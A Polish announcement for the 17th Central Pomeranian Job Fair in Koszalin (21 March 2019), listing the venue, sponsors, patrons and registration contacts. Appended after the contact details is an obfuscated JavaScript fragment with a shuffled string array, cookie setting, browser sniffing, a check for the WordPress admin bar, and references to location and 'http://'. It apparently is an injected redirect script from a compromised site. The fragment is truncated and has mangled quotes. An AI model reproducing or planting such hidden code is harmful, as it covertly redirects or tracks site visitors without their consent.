17. Środkowopomorskie Targi Pracy AutoStore Job Fair 2019 | Północna Izba Gospodarcza w Koszalinie

Biuro Karier Politechniki Koszalińskiej zaprasza na 17. Środkowopomorskie Targi Pracy AutoStore  Job Fair 2019, które odbędą się w dniu 21.03.2019 r. w godz. 11:00 – 15:00 w Hali Widowiskowo – Sportowej przy ul. Śniadeckich 4 w Koszalinie.  Poprzednia edycja targów zgromadziła 80 wystawców oraz 3000 osób poszukujących zatrudnienia.

Targi Pracy mają na celu nie tylko prezentację aktualnych ofert pracy, praktyk i staży, ale także wymianę informacji dotyczących aktualnej sytuacji na rynku pracy. Do udziału w targach zachęcamy firmy poszukujące pracowników różnego szczebla (pracowników fizycznych, produkcyjnych) jak
i specjalistów czy menadżerów. Do odwiedzenia targów zapraszamy wszystkie osoby poszukujące pracy lub planujące swoją karierę zawodową. Targi organizowane przez Biuro Karier Politechniki Koszalińskiej umożliwiają pozyskanie najzdolniejszych studentów i absolwentów dla celów rekrutacyjnych, a osobom poszukującym pracy umożliwiają zapoznanie się z systemem rekrutacji obowiązującym w danej firmie oraz dają szansę na zatrudnienie lub pozyskanie praktyki bądź stażu.

Sponsorem tytularnym tegorocznej edycji Targów Pracy jest firma AutoStore Sp. z o.o.

Firma GlobalLogic S.A. uzyskała tytuł – Wiodący Partner Gospodarczy, Partnerem Honorowym
17. edycji Targów Pracy został Bank Polska Kasa Opieki S.A., ponadto firma Espersen, Meden-Inmed
Sp. z o.o. oraz Pomorska Agencja Rozwoju Regionalnego S.A. są tegorocznymi sponsorami strategicznymi.

Tragi swoim patronatem objęli: Prezydenci Koszalina i Słupska, Marszałek woj. zachodniopomorskiego, Północna Izba Gospodarcza oraz Koszalińska Izba Przemysłowo – Handlowa.

Więcej informacji na temat Targów Pracy oraz aktualną listę wystawców można znaleźć na stronie www.targipracy.koszalin.pl.

Zapraszamy firmy do pobrania dokumentów aplikacyjnych ze strony www.targipracy.koszalin.pl, zgłoszenia przyjmowane są do dnia 26.02.2019 r. Dodatkowych informacji udzielamy pod nr 94 348 66 76 oraz  mailowo bk@kariera.koszalin.pl. 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m